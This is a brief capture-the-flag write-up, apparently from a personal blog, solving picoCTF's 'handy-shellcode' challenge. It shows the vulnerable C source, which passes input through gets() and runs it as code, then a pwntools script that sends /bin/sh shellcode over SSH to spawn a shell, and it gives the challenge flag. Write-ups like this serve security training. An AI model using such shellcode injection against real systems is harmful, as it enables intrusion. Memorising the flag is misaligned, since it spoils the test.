ii4gsp

picoCTF - handy-shellcode

ii4gsp 2020. 3. 6. 10:40

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 148
#define FLAGSIZE 128

void vuln(char *buf){
  gets(buf);
  puts(buf);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);
  
  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  char buf[BUFSIZE];

  puts("Enter your shellcode:");
  vuln(buf);

  puts("Thanks! Executing now...");
  
  ((void (*)())buf)();


  puts("Finishing Executing Shellcode. Exiting now...");
  
  return 0;
}

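The program reads our input into buf with gets() and then calls buf as a function, so all we have to do is build shellcode and send it.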

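from pwn import *

# Connect to the picoCTF shell server (credentials left blank) and start the challenge binary
s = ssh(host = '2019shell1.picoctf.com', user = '', password = '')
s.set_working_directory('/problems/handy-shellcode_5_d1b3658f284f442eac06607b8ac4d1f5')
p = s.process('./vuln')

# Assemble pwntools' stock 32-bit Linux /bin/sh shellcode
shellcode = asm(shellcraft.i386.linux.sh())

# gets() reads up to the newline that sendline() appends
p.sendline(shellcode)

# Hand the session over to the terminal so the flag can be read
p.interactive()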

Flag: picoCTF{h4ndY_d4ndY_sh311c0d3_0b440487}
